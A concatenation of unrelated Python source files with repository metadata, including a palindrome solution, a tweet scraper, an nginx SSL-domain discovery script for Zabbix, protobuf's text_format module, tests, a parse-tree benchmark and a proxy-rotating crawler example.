# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__version__ = '2.4.2'
| 51.772727 | 80 | 0.775241 |
98074bd5fb28125a2d075874b342c834c7810ae3 | 523 | py | Python | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | code/Solution_0009_isPalindrome.py | qizhenkang/myLeetCode | cb9edce69567eba9d96ce756507a5a7ac6e74293 | [
"MIT"
] | null | null | null | class Solution:
def isPalindrome(self, x: int) -> bool:
result = False
y = x
x_p = 0
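        # Reverse the decimal digits of x into x_p (peel off the last digit of y each
        # iteration); x is a palindrome exactly when the reversed number equals x.
        # Negative numbers skip the loop and keep result = False.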
if x >= 0:
while y != 0:
x_p = x_p * 10 + y % 10
y = int(y / 10)
if x == x_p:
result = True
return result
if __name__ == '__main__':
solu = Solution()
# input_numRows = 2
input_Str = str(' -42 3sd')
# input_num = 11223
output_Str = 'result = ' + str(solu.isPalindrome(-10))
print(output_Str)
| 23.772727 | 58 | 0.460803 |
4559730fda304b2ab931bfc17c2a1b84111398a9 | 2,300 | py | Python | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | pws/scraper.py | zamys/pws | b26ddb12cbbb00ef3a337d8b5a8ef7dc051d4b13 | [
"MIT"
] | null | null | null | import keys
import tweepy
import datetime
import time
import jsonpickle
time_start = time.time()
# Authentication
key = keys.GetKeys()
auth = tweepy.OAuthHandler(key.consumer, key.consumer_secret)
auth.set_access_token(key.access_token, key.access_token_secret)
api = tweepy.API(auth)
# How many tweets are saved per run
date_today = datetime.datetime.now() # today's date
tweets_per_query = 100 # Twitter does not allow more per request
tweets_max = 500 # total number of tweets to save per run
file_name = 'tweets-'+ date_today.strftime('%d-%m-%y') +'.txt'
since_id = None
max_id = -1
tweet_count = 0
print("Download begint nu...")
#Scraper gaat zoeken naar:
search_query = "#COVID19"
with open(file_name,'w') as f:
print("Tweets met " + search_query + " worden gedownload.")
while(tweet_count<tweets_max):
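        # Tweepy's search returns the newest tweets first. max_id pages backwards through
        # older results (max_id - 1 excludes tweets already written), while since_id could
        # restrict a later run to tweets newer than the ones fetched before.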
try:
if(max_id<=0):
if(not since_id):
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended')
else:
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',since_id=since_id)
else:
if(not since_id):
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',max_id=str(max_id-1))
else:
tweets_new = api.search(q=search_query,count=tweets_per_query,lang="en",tweet_mode='extended',max_id=str(max_id-1),since_id=since_id)
            # If no new tweets came in:
if(not tweets_new):
print("Geen nieuwe tweets gevonden")
break
for tweet in tweets_new:
f.write(jsonpickle.encode(tweet._json,unpicklable=False)+'\n')
tweet_count += len(tweets_new)
print("{0} tweets zijn gedownload".format(tweet_count))
max_id = tweets_new[-1].id
except tweepy.TweepError as err:
print("Foutmelding: "+str(err))
break
time_end = time.time()
time_elapsed = time_end-time_start
print("{0} tweets zijn gedownload en zijn opgeslagen in {1}".format(tweet_count,file_name))
print("Het heeft {0} seconden geduurd".format(time_elapsed)) | 37.704918 | 153 | 0.653043 |
e4d10182ff87fb56988884cc61ae63704f69a03e | 994 | py | Python | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | scripts/disc_ssl_https.py | leshak/zabbix-ssl-nginx | efed212bbb17a32dddc9d30beb354c040ba63f65 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import crossplane
import json
NGINX_CONFIG_PATH = '/etc/nginx/nginx.conf'
HTTPS_PORT = 'ssl'
domainsList = []
nginxConfig = crossplane.parse(NGINX_CONFIG_PATH)
if nginxConfig['config']:
for cfile in nginxConfig['config']:
for parsed in cfile['parsed']:
if 'block' in parsed:
foundHttps = False
httpsDomain = None
for blk in parsed['block']:
if blk['directive'] == 'listen':
if HTTPS_PORT in blk['args']:
foundHttps = True
if foundHttps and blk['directive'] == 'server_name' and len(blk['args']) > 0:
httpsDomain = blk['args'][0]
                if foundHttps and httpsDomain is not None:
domainsList.append({
"{#DOMAIN_HTTPS}": httpsDomain
})
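# Emit the Zabbix low-level discovery JSON, e.g. {"data": [{"{#DOMAIN_HTTPS}": "example.com"}, ...]};
# the {#DOMAIN_HTTPS} macro is then substituted into item/trigger prototypes by Zabbix.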
print(json.dumps({
'data': domainsList
}))
| 26.157895 | 97 | 0.512072 |
43ec89f1b417e6516f1bb26be4a9317302480397 | 21,689 | py | Python | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 2,661 | 2017-03-20T22:12:50.000Z | 2022-03-30T09:43:19.000Z | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 1,531 | 2017-03-24T17:20:32.000Z | 2022-03-16T18:11:14.000Z | earth_enterprise/src/google/protobuf-py/google/protobuf/text_format.py | ezeeyahoo/earthenterprise | b6cac9e6228946f2f17d1edb75e118aeb3e8e8c9 | [
"Apache-2.0"
] | 990 | 2017-03-24T11:54:28.000Z | 2022-03-22T11:51:47.000Z | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in text format."""
import cStringIO
import re
from collections import deque
from google.protobuf.internal import type_checkers
from google.protobuf import descriptor
__all__ = [ 'MessageToString', 'PrintMessage', 'PrintField',
'PrintFieldValue', 'Merge' ]
# Infinity and NaN are not explicitly supported by Python pre-2.6, and
# float('inf') does not work on Windows (pre-2.6).
_INFINITY = 1e10000 # overflows, thus will actually be infinity.
_NAN = _INFINITY * 0
class ParseError(Exception):
"""Thrown in case of ASCII parsing error."""
def MessageToString(message, as_utf8=False, as_one_line=False):
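  # Render the message in protocol buffer text format and return it as a string;
  # as_one_line collapses the output onto a single line (with the trailing space stripped).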
out = cStringIO.StringIO()
PrintMessage(message, out, as_utf8=as_utf8, as_one_line=as_one_line)
result = out.getvalue()
out.close()
if as_one_line:
return result.rstrip()
return result
def PrintMessage(message, out, indent=0, as_utf8=False, as_one_line=False):
for field, value in message.ListFields():
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
for element in value:
PrintField(field, element, out, indent, as_utf8, as_one_line)
else:
PrintField(field, value, out, indent, as_utf8, as_one_line)
def PrintField(field, value, out, indent=0, as_utf8=False, as_one_line=False):
"""Print a single field name/value pair. For repeated fields, the value
should be a single element."""
  out.write(' ' * indent)
if field.is_extension:
out.write('[')
if (field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL):
out.write(field.message_type.full_name)
else:
out.write(field.full_name)
out.write(']')
elif field.type == descriptor.FieldDescriptor.TYPE_GROUP:
# For groups, use the capitalized name.
out.write(field.message_type.name)
else:
out.write(field.name)
if field.cpp_type != descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
# The colon is optional in this case, but our cross-language golden files
# don't include it.
out.write(': ')
PrintFieldValue(field, value, out, indent, as_utf8, as_one_line)
if as_one_line:
out.write(' ')
else:
out.write('\n')
def PrintFieldValue(field, value, out, indent=0,
as_utf8=False, as_one_line=False):
"""Print a single field value (not including name). For repeated fields,
the value should be a single element."""
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
if as_one_line:
out.write(' { ')
PrintMessage(value, out, indent, as_utf8, as_one_line)
out.write('}')
else:
out.write(' {\n')
PrintMessage(value, out, indent + 2, as_utf8, as_one_line)
out.write(' ' * indent + '}')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
out.write(field.enum_type.values_by_number[value].name)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
out.write('\"')
if type(value) is unicode:
out.write(_CEscape(value.encode('utf-8'), as_utf8))
else:
out.write(_CEscape(value, as_utf8))
out.write('\"')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
out.write("true")
else:
out.write("false")
else:
out.write(str(value))
def Merge(text, message):
"""Merges an ASCII representation of a protocol message into a message.
Args:
text: Message ASCII representation.
message: A protocol buffer message to merge into.
Raises:
ParseError: On ASCII parsing problems.
"""
tokenizer = _Tokenizer(text)
while not tokenizer.AtEnd():
_MergeField(tokenizer, message)
def _MergeField(tokenizer, message):
"""Merges a single protocol message field into a message.
Args:
tokenizer: A tokenizer to parse the field name and values.
message: A protocol message to record the data.
Raises:
ParseError: In case of ASCII parsing problems.
"""
message_descriptor = message.DESCRIPTOR
if tokenizer.TryConsume('['):
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
name = '.'.join(name)
if not message_descriptor.is_extendable:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" does not have extensions.' %
message_descriptor.full_name)
field = message.Extensions._FindExtensionByName(name)
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" not registered.' % name)
elif message_descriptor != field.containing_type:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" does not extend message type "%s".' % (
name, message_descriptor.full_name))
tokenizer.Consume(']')
else:
name = tokenizer.ConsumeIdentifier()
field = message_descriptor.fields_by_name.get(name, None)
# Group names are expected to be capitalized as they appear in the
# .proto file, which actually matches their type names, not their field
# names.
if not field:
field = message_descriptor.fields_by_name.get(name.lower(), None)
if field and field.type != descriptor.FieldDescriptor.TYPE_GROUP:
field = None
if (field and field.type == descriptor.FieldDescriptor.TYPE_GROUP and
field.message_type.name != name):
field = None
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" has no field named "%s".' % (
message_descriptor.full_name, name))
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
tokenizer.TryConsume(':')
if tokenizer.TryConsume('<'):
end_token = '>'
else:
tokenizer.Consume('{')
end_token = '}'
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
sub_message = message.Extensions[field].add()
else:
sub_message = getattr(message, field.name).add()
else:
if field.is_extension:
sub_message = message.Extensions[field]
else:
sub_message = getattr(message, field.name)
sub_message.SetInParent()
while not tokenizer.TryConsume(end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' % (end_token))
_MergeField(tokenizer, sub_message)
else:
_MergeScalarField(tokenizer, message, field)
def _MergeScalarField(tokenizer, message, field):
"""Merges a single protocol message scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: A protocol message to record the data.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of ASCII parsing problems.
RuntimeError: On runtime errors.
"""
tokenizer.Consume(':')
value = None
if field.type in (descriptor.FieldDescriptor.TYPE_INT32,
descriptor.FieldDescriptor.TYPE_SINT32,
descriptor.FieldDescriptor.TYPE_SFIXED32):
value = tokenizer.ConsumeInt32()
elif field.type in (descriptor.FieldDescriptor.TYPE_INT64,
descriptor.FieldDescriptor.TYPE_SINT64,
descriptor.FieldDescriptor.TYPE_SFIXED64):
value = tokenizer.ConsumeInt64()
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT32,
descriptor.FieldDescriptor.TYPE_FIXED32):
value = tokenizer.ConsumeUint32()
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT64,
descriptor.FieldDescriptor.TYPE_FIXED64):
value = tokenizer.ConsumeUint64()
elif field.type in (descriptor.FieldDescriptor.TYPE_FLOAT,
descriptor.FieldDescriptor.TYPE_DOUBLE):
value = tokenizer.ConsumeFloat()
elif field.type == descriptor.FieldDescriptor.TYPE_BOOL:
value = tokenizer.ConsumeBool()
elif field.type == descriptor.FieldDescriptor.TYPE_STRING:
value = tokenizer.ConsumeString()
elif field.type == descriptor.FieldDescriptor.TYPE_BYTES:
value = tokenizer.ConsumeByteString()
elif field.type == descriptor.FieldDescriptor.TYPE_ENUM:
# Enum can be specified by a number (the enum value), or by
# a string literal (the enum name).
enum_descriptor = field.enum_type
if tokenizer.LookingAtInteger():
number = tokenizer.ConsumeInt32()
enum_value = enum_descriptor.values_by_number.get(number, None)
if enum_value is None:
raise tokenizer.ParseErrorPreviousToken(
'Enum type "%s" has no value with number %d.' % (
enum_descriptor.full_name, number))
else:
identifier = tokenizer.ConsumeIdentifier()
enum_value = enum_descriptor.values_by_name.get(identifier, None)
if enum_value is None:
raise tokenizer.ParseErrorPreviousToken(
'Enum type "%s" has no value named %s.' % (
enum_descriptor.full_name, identifier))
value = enum_value.number
else:
raise RuntimeError('Unknown field type %d' % field.type)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
message.Extensions[field].append(value)
else:
getattr(message, field.name).append(value)
else:
if field.is_extension:
message.Extensions[field] = value
else:
setattr(message, field.name, value)
class _Tokenizer(object):
"""Protocol buffer ASCII representation tokenizer.
This class handles the lower level string parsing by splitting it into
meaningful tokens.
It was directly ported from the Java protocol buffer API.
"""
_WHITESPACE = re.compile('(\\s|(#.*$))+', re.MULTILINE)
_TOKEN = re.compile(
'[a-zA-Z_][0-9a-zA-Z_+-]*|' # an identifier
'[0-9+-][0-9a-zA-Z_.+-]*|' # a number
'\"([^\"\n\\\\]|\\\\.)*(\"|\\\\?$)|' # a double-quoted string
'\'([^\'\n\\\\]|\\\\.)*(\'|\\\\?$)') # a single-quoted string
_IDENTIFIER = re.compile('\w+')
_INTEGER_CHECKERS = [type_checkers.Uint32ValueChecker(),
type_checkers.Int32ValueChecker(),
type_checkers.Uint64ValueChecker(),
type_checkers.Int64ValueChecker()]
_FLOAT_INFINITY = re.compile('-?inf(inity)?f?', re.IGNORECASE)
_FLOAT_NAN = re.compile("nanf?", re.IGNORECASE)
def __init__(self, text_message):
self._text_message = text_message
self._position = 0
self._line = -1
self._column = 0
self._token_start = None
self.token = ''
self._lines = deque(text_message.split('\n'))
self._current_line = ''
self._previous_line = 0
self._previous_column = 0
self._SkipWhitespace()
self.NextToken()
def AtEnd(self):
"""Checks the end of the text was reached.
Returns:
True iff the end was reached.
"""
return self.token == ''
def _PopLine(self):
while len(self._current_line) <= self._column:
if not self._lines:
self._current_line = ''
return
self._line += 1
self._column = 0
self._current_line = self._lines.popleft()
def _SkipWhitespace(self):
while True:
self._PopLine()
match = self._WHITESPACE.match(self._current_line, self._column)
if not match:
break
length = len(match.group(0))
self._column += length
def TryConsume(self, token):
"""Tries to consume a given piece of text.
Args:
token: Text to consume.
Returns:
True iff the text was consumed.
"""
if self.token == token:
self.NextToken()
return True
return False
def Consume(self, token):
"""Consumes a piece of text.
Args:
token: Text to consume.
Raises:
ParseError: If the text couldn't be consumed.
"""
if not self.TryConsume(token):
raise self._ParseError('Expected "%s".' % token)
def LookingAtInteger(self):
"""Checks if the current token is an integer.
Returns:
True iff the current token is an integer.
"""
if not self.token:
return False
c = self.token[0]
return (c >= '0' and c <= '9') or c == '-' or c == '+'
def ConsumeIdentifier(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER.match(result):
raise self._ParseError('Expected identifier.')
self.NextToken()
return result
def ConsumeInt32(self):
"""Consumes a signed 32bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 32bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=True, is_long=False)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeUint32(self):
"""Consumes an unsigned 32bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 32bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=False, is_long=False)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeInt64(self):
"""Consumes a signed 64bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 64bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=True, is_long=True)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeUint64(self):
"""Consumes an unsigned 64bit integer number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 64bit integer couldn't be consumed.
"""
try:
result = self._ParseInteger(self.token, is_signed=False, is_long=True)
except ValueError, e:
raise self._IntegerParseError(e)
self.NextToken()
return result
def ConsumeFloat(self):
"""Consumes an floating point number.
Returns:
The number parsed.
Raises:
ParseError: If a floating point number couldn't be consumed.
"""
text = self.token
if self._FLOAT_INFINITY.match(text):
self.NextToken()
if text.startswith('-'):
return -_INFINITY
return _INFINITY
if self._FLOAT_NAN.match(text):
self.NextToken()
return _NAN
try:
result = float(text)
except ValueError, e:
raise self._FloatParseError(e)
self.NextToken()
return result
def ConsumeBool(self):
"""Consumes a boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if self.token in ('true', 't', '1'):
self.NextToken()
return True
elif self.token in ('false', 'f', '0'):
self.NextToken()
return False
else:
raise self._ParseError('Expected "true" or "false".')
def ConsumeString(self):
"""Consumes a string value.
Returns:
The string parsed.
Raises:
ParseError: If a string value couldn't be consumed.
"""
bytes = self.ConsumeByteString()
try:
return unicode(bytes, 'utf-8')
except UnicodeDecodeError, e:
raise self._StringParseError(e)
def ConsumeByteString(self):
"""Consumes a byte array value.
Returns:
The array parsed (as a string).
Raises:
ParseError: If a byte array value couldn't be consumed.
"""
list = [self._ConsumeSingleByteString()]
while len(self.token) > 0 and self.token[0] in ('\'', '"'):
list.append(self._ConsumeSingleByteString())
return "".join(list)
def _ConsumeSingleByteString(self):
"""Consume one token of a string literal.
String literals (whether bytes or text) can come in multiple adjacent
tokens which are automatically concatenated, like in C or Python. This
method only consumes one token.
"""
text = self.token
if len(text) < 1 or text[0] not in ('\'', '"'):
      raise self._ParseError('Expected string.')
if len(text) < 2 or text[-1] != text[0]:
raise self._ParseError('String missing ending quote.')
try:
result = _CUnescape(text[1:-1])
except ValueError, e:
raise self._ParseError(str(e))
self.NextToken()
return result
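  # Example of the adjacent string-literal concatenation described above
  # (illustrative): a field written as   name: "ab" "cd"   is read as two string
  # tokens here, and ConsumeByteString() joins them into "abcd".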
def _ParseInteger(self, text, is_signed=False, is_long=False):
"""Parses an integer.
Args:
text: The text to parse.
is_signed: True if a signed integer must be parsed.
is_long: True if a long integer must be parsed.
Returns:
The integer value.
Raises:
      ValueError: Thrown iff the text is not a valid integer.
"""
pos = 0
if text.startswith('-'):
pos += 1
base = 10
if text.startswith('0x', pos) or text.startswith('0X', pos):
base = 16
elif text.startswith('0', pos):
base = 8
# Do the actual parsing. Exception handling is propagated to caller.
result = int(text, base)
# Check if the integer is sane. Exceptions handled by callers.
checker = self._INTEGER_CHECKERS[2 * int(is_long) + int(is_signed)]
checker.CheckValue(result)
return result
def ParseErrorPreviousToken(self, message):
"""Creates and *returns* a ParseError for the previously read token.
Args:
message: A message to set for the exception.
Returns:
A ParseError instance.
"""
return ParseError('%d:%d : %s' % (
self._previous_line + 1, self._previous_column + 1, message))
def _ParseError(self, message):
"""Creates and *returns* a ParseError for the current token."""
return ParseError('%d:%d : %s' % (
self._line + 1, self._column - len(self.token) + 1, message))
def _IntegerParseError(self, e):
return self._ParseError('Couldn\'t parse integer: ' + str(e))
def _FloatParseError(self, e):
return self._ParseError('Couldn\'t parse number: ' + str(e))
def _StringParseError(self, e):
return self._ParseError('Couldn\'t parse string: ' + str(e))
def NextToken(self):
"""Reads the next meaningful token."""
self._previous_line = self._line
self._previous_column = self._column
self._column += len(self.token)
self._SkipWhitespace()
if not self._lines and len(self._current_line) <= self._column:
self.token = ''
return
match = self._TOKEN.match(self._current_line, self._column)
if match:
token = match.group(0)
self.token = token
else:
self.token = self._current_line[self._column]
# text.encode('string_escape') does not seem to satisfy our needs as it
# encodes unprintable characters using two-digit hex escapes whereas our
# C++ unescaping function allows hex escapes to be any length. So,
# "\0011".encode('string_escape') ends up being "\\x011", which will be
# decoded in C++ as a single-character string with char code 0x11.
def _CEscape(text, as_utf8):
def escape(c):
o = ord(c)
if o == 10: return r"\n" # optional escape
if o == 13: return r"\r" # optional escape
if o == 9: return r"\t" # optional escape
if o == 39: return r"\'" # optional escape
if o == 34: return r'\"' # necessary escape
if o == 92: return r"\\" # necessary escape
# necessary escapes
if not as_utf8 and (o >= 127 or o < 32): return "\\%03o" % o
return c
return "".join([escape(c) for c in text])
_CUNESCAPE_HEX = re.compile('\\\\x([0-9a-fA-F]{2}|[0-9a-fA-F])')
def _CUnescape(text):
def ReplaceHex(m):
return chr(int(m.group(0)[2:], 16))
# This is required because the 'string_escape' encoding doesn't
# allow single-digit hex escapes (like '\xf').
result = _CUNESCAPE_HEX.sub(ReplaceHex, text)
return result.decode('string_escape')
| 31.387844 | 79 | 0.669418 |
9ad960a686576a290ce25c35c471ea05346f4786 | 419 | py | Python | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | 1 | 2022-02-10T02:13:07.000Z | 2022-02-10T02:13:07.000Z | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | 6 | 2022-01-05T09:15:54.000Z | 2022-01-09T05:48:43.000Z | src/dsalgo/queue_test.py | kagemeka/python-algorithms | dface89b8c618845cf524429aa8e97c4b2b10ceb | [
"MIT"
] | null | null | null | import unittest
import dsalgo.queue
class Test(unittest.TestCase):
def test_singly_linked_list(self) -> None:
que = dsalgo.queue.SinglyLinkedList[int]()
que.append(1)
self.assertEqual(len(que), 1)
self.assertEqual(que.pop(), 1)
self.assertEqual(len(que), 0)
with self.assertRaises(Exception):
que.pop()
if __name__ == "__main__":
unittest.main()
| 22.052632 | 50 | 0.630072 |
cd88a02de866c1e82cdf9dba42793edc9216ea6b | 2,923 | py | Python | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | 1 | 2019-06-19T20:27:55.000Z | 2019-06-19T20:27:55.000Z | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | 21 | 2019-04-12T01:08:20.000Z | 2020-11-09T18:28:41.000Z | benchmarks/parsetree_benchmark.py | devincornell/sqlitedocuments | 16923bb3b91af5104140e49045efdc612afbc310 | [
"MIT"
] | null | null | null | import pickle
import pathlib
import spacy
import sys
sys.path.append('..')
import doctable
import timing
import tqdm
import urllib.request
def download_nss(
baseurl='https://raw.githubusercontent.com/devincornell/nssdocs/master/docs/',
years = (1987, 1988, 1990, 1991, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2002, 2006, 2010, 2015, 2017)
):
def read_url(url):
return urllib.request.urlopen(url).read().decode('utf-8')
ftemp = baseurl+'{}.txt'
all_texts = [read_url(ftemp.format(year)) for year in tqdm.tqdm(years)]
return {yr:text for yr,text in zip(years,all_texts)}
def write_trees_pickle(ptrees, fpaths, use_dict=True):
for fpath, ptree in zip(fpaths, ptrees):
if use_dict:
fpath.write_bytes(ptree.as_pickle())
else:
fpath.write_bytes(pickle.dumps(ptree))
def av_file_size(fpaths):
sizes = list()
for fpath in fpaths:
sizes.append(fpath.stat().st_size)
return sum(sizes) / len(sizes)
def read_trees_pickle(fpaths, use_dict=True):
trees = list()
for fpath in fpaths:
if use_dict:
trees.append(doctable.ParseTree.from_pickle(fpath.read_bytes()))
else:
trees.append(pickle.loads(fpath.read_bytes()))
return trees
if __name__ == '__main__':
cache_path = pathlib.Path('tmp_nss/nss_data.pic')
timer = doctable.Timer()
if not cache_path.exists():
timer.step('Downloading nss files.')
nss_texts = download_nss()
timer.step('parsing files')
nlp = spacy.load('en_core_web_sm')
docs = [nlp(text) for yr,text in tqdm.tqdm(nss_texts.items())]
# saving for future use
cache_path.write_bytes(pickle.dumps(docs))
else:
timer.step('cache file found - now reading')
docs = pickle.loads(cache_path.read_bytes())
timer.step('create list of parsetrees')
trees = [doctable.ParseTree.from_spacy(sent) for doc in docs for sent in doc.sents]
print(trees[2])
timer.step('creating file paths')
tmp = doctable.TempFolder('tmp_parsetrees')
fpaths = [tmp.path/f'{i}.pic' for i in range(len(trees))]
timer.step('testing dictionary-based method')
f = lambda: write_trees_pickle(trees, fpaths, use_dict=True)
print(f'dict-based write: {timing.time_call(f)}')
print(f'av filesize: {av_file_size(fpaths)/1000:0.2f} kB')
f = lambda: read_trees_pickle(fpaths, use_dict=True)
print(f'dict-based read: {timing.time_call(f)}')
timer.step('cleaning up files')
for fpath in fpaths:
fpath.unlink()
timer.step('testing raw pickle method')
f = lambda: write_trees_pickle(trees, fpaths, use_dict=False)
print(f'pickle-based write: {timing.time_call(f)}')
print(f'av filesize: {av_file_size(fpaths)/1000:0.2f} kB')
f = lambda: read_trees_pickle(fpaths, use_dict=False)
print(f'pickle-based read: {timing.time_call(f)}')
| 31.430108 | 111 | 0.669176 |
ce026a18d747345384f03f637aa8a2b7c9735496 | 1,529 | py | Python | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 9 | 2019-09-29T05:59:27.000Z | 2020-01-11T04:54:05.000Z | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 3 | 2019-09-29T06:10:56.000Z | 2019-11-29T06:41:02.000Z | examples/example.py | jsongmax/proxy_pool | 6e85b474d66a3f1f7bc5b006ea1d042c9ff12e14 | [
"Apache-2.0"
] | 5 | 2019-09-30T06:35:03.000Z | 2020-09-29T08:07:42.000Z | # -*- coding: utf-8 -*-
import random
import time
import redis
import requests
from fake_useragent import UserAgent
from lxml import etree
# Redis connection pool
pool = redis.ConnectionPool(host="127.0.0.1", port=6379, db=15)
# Get a Redis client from the connection pool
redis_client = redis.Redis(connection_pool=pool, decode_responses=True)
REDIS_KEY = "freeproxies"
def get_proxy_from_redis():
proxy_list = redis_client.zrevrange(REDIS_KEY, 0, 61)
proxy = random.choice(proxy_list)
proxies = {
'http': 'http://{}'.format(proxy.decode('utf-8')),
'https': 'https://{}'.format(proxy.decode('utf-8')),
}
return proxies
def crawler():
headers = {
'User-Agent': UserAgent().random,
}
url = 'https://www.ubaike.cn/show_10672628.html'
for _ in range(1, 61):
proxies = get_proxy_from_redis()
print("当前ip:{}".format(proxies))
res = requests.get(url=url, headers=headers, proxies=proxies, timeout=15)
doc = etree.HTML(res.text)
title = doc.xpath('//h1[@class="title"]/text()')
print("企业名称:{}".format(title))
def statistic_time(function):
def wrapper(*args, **kwargs):
print('[Function {name} start]'.format(name=function.__name__))
start_time = time.time()
result = function(*args, **kwargs)
end_time = time.time()
print('[Function: {name} finished spent time:{time:.2f}s]'.format(name=function.__name__, time=end_time-start_time))
return result
return wrapper
